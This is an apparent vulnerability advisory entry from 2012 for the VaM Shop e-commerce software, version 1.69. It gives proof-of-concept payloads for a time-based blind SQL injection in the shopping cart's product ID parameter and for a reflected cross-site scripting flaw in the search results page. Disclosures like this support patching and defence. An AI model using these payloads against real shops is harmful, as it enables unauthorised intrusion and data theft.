vendor:
VaM Shop
by:
Security Effect Team
7,5
CVSS
HIGH
Blind SQL Injection & Multiple XSS
Not Available
CWE
Product Name: VaM Shop
Affected Version From: 1.69
Affected Version To: Prior Versions
Patch Exists: NO
Related CWE: Not Available
CPE: Not Available
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Not Available
2012
VaM Shop Vulnerability
Blind SQL injection in shopping_cart.php in parameter product_id[]. PoC: POST /shopping_cart.php?action=update_product cart_delete[]=2071&cart_quantity[]=1&old_qty[]=1&products_id[]=2071' and sleep(2)%3d%27. Multiple XSS(cross-site scripting). PoC: /advanced_search_result.php/o" onmouseover=prompt(123) //
Mitigation:
Not Available